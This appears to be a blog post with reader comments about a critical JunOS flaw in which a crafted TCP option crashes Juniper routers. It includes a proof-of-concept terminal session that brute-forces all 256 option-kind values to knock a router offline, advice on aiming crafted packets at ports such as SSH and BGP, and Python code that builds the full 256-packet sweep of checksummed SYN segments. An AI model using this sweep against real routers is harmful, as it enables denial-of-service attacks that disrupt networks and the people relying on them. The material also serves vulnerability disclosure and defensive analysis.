"Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic." - The Register news.
The JunOS kernel will crash (i.e. dump core) when a specifically crafted TCP option is received on a listening TCP port. The packet cannot be filtered with the Junos firewall filter. A router receiving this specific TCP packet will crash and reboot.
Affected Devices:
JunOS 3.x - 10.x (versions released earlier than 1/28/2009)
Software releases built on or after January 28, 2009 have already fixed the issue.
Solution:
Upgrade the OS. There are no totally effective workarounds.
Funny:
"A Juniper spokeswoman said the bulletin was one of seven security advisories the company issued under a policy designed to prevent members of the public at large from getting details of the vulnerabilities."
"Because of Juniper's 'Entitled Disclosure Policy,' only our customers and partners are allowed access to the details of the Security Advisory," the spokeswoman wrote.
Ooohhh... How about this: "when a specifically crafted TCP option is received on a listening TCP port"?
That is more than enough! The option-kind field is a single octet, so we have 256 guesses ;)
Simple Proof-of-Concept demo:
hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
64 bytes from 169.254.1.1: icmp_seq=0 ttl=254 time=4.623 ms
64 bytes from 169.254.1.1: icmp_seq=1 ttl=254 time=4.531 ms
64 bytes from 169.254.1.1: icmp_seq=2 ttl=254 time=4.315 ms
^C<...>
hod# ./hod-junos-test 169.254.1.1 22
[*] Target IP: 169.254.1.1, Port: 22
[+] Sending TCP-packets with various crafted TCP options
[+] TCP options bruteforce progress:
[..........................................................
...........................................................
...........................................................
.......................................................]
[+] OK
hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
^C
256 packets and the JunOS router is dead; after analysing the sniffed traffic we know the real "evil" TCP packet!
The JUNOS firewall filter (ACL) is unable to filter out a TCP packet carrying this issue!
Successful exploitation requires knowledge of a listening remote TCP port (open or firewall-filtered, it doesn't matter at all).
For example, attackers can blindly send many crafted packets to "well known" TCP ports (22/SSH, 179/BGP and others).
And that's enough.
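To make the "256 guesses" concrete, here is an added example (not the hod-junos-test tool from the post, and not Juniper code) that builds, in memory only, one TCP SYN per option-kind value with a valid pseudo-header checksum, and parses the options area back out of a segment the way you would when inspecting sniffed traffic. The addresses and ports are placeholders; the single 0x00 value octet follows what the post and the comments describe and is deliberately not a well-formed value for the kinds that have one. Nothing is transmitted.

```python
import socket
import struct


def ip_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum (odd-length input is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def encode_option(kind: int, data: bytes = b"") -> bytes:
    """Encode one TCP option and pad the options area to a 32-bit boundary.
    Kinds 0 (EOL) and 1 (NOP) are bare single octets; all others are
    kind / total-length / data.  The kind octet is the 256-value space."""
    if not 0 <= kind <= 0xFF:
        raise ValueError("option-kind is a single octet")
    opt = bytes([kind]) if kind in (0, 1) else bytes([kind, 2 + len(data)]) + data
    return opt + b"\x00" * (-len(opt) % 4)


def pseudo_header(src_ip: str, dst_ip: str, tcp_len: int) -> bytes:
    """IPv4 pseudo-header that the TCP checksum covers."""
    return (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
            + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len))


def build_tcp_segment(src_ip: str, dst_ip: str, sport: int, dport: int,
                      kind: int, data: bytes = b"\x00", seq: int = 0) -> bytes:
    """Assemble a SYN whose options area holds exactly one option of `kind`.
    The checksum is computed over the pseudo-header so a receiver will not
    discard the segment before looking at the option."""
    options = encode_option(kind, data)
    data_offset = 5 + len(options) // 4        # header length in 32-bit words
    syn = 0x02
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0,
                      data_offset << 4, syn, 65535, 0, 0) + options
    csum = ip_checksum(pseudo_header(src_ip, dst_ip, len(hdr)) + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def tcp_checksum_ok(src_ip: str, dst_ip: str, segment: bytes) -> bool:
    """A segment with a correct checksum sums to zero together with its pseudo-header."""
    return ip_checksum(pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def option_kind_sweep(src_ip: str, dst_ip: str, sport: int, dport: int):
    """Yield (kind, segment) for every option-kind value: the 256-packet search
    space described in the post, with all other octets held constant."""
    for kind in range(256):
        yield kind, build_tcp_segment(src_ip, dst_ip, sport, dport, kind)


def parse_options(segment: bytes):
    """Walk the options area of a TCP header (e.g. from a sniffed segment) and
    return (kind, data) pairs.  EOL ends the walk, NOP is skipped, and a
    length that runs past the header or is below 2 is rejected rather than
    silently trusted."""
    data_offset = (segment[12] >> 4) * 4
    opts = segment[20:data_offset]
    found, i = [], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:
            break
        if kind == 1:
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("truncated option at offset %d" % i)
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad length %d for option kind %d" % (length, kind))
        found.append((kind, opts[i + 2:i + length]))
        i += length
    return found


if __name__ == "__main__":
    # Placeholder addresses (constructed for the example).
    for kind, seg in option_kind_sweep("169.254.1.2", "169.254.1.1", 40000, 22):
        print("kind %3d -> %s" % (kind, parse_options(seg)))
```

The sweep is a generator rather than a sender on purpose: it lets you look at exactly what each of the 256 candidates puts on the wire, and the parser is the piece you reuse on a capture to identify which option kind was in flight when a device went down.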
Are you just looping through the first 8 bits of the TCP options header? Looking at the ol' TCP header diagram here it looks like TCP options + padding has 32 bits to muck with.
Thanks, Ryan, for the comment.
Of course, TCP options have a variable length.
In the first test case I fuzzed only the option-kind octet:
option-kind octet - fuzzing
other octets - constants
And of course, full fuzzing is much more than 8 bits, but not that long either.
Thanks!
It was late when I tried this, but I see now that the options are variable length. I looped through all the values in the option-kind octet (assuming only one option here), with a value octet of x00, then I tried just plain leaving the value off. I could do some captures here, but am using Scapy and I betcha it is properly padding out the option field... this requires an improperly padded field, right?
Also see this blog + video:
http://www.toonk.nl/blog/?p=522
It seems that firewall filters do help to a certain extent.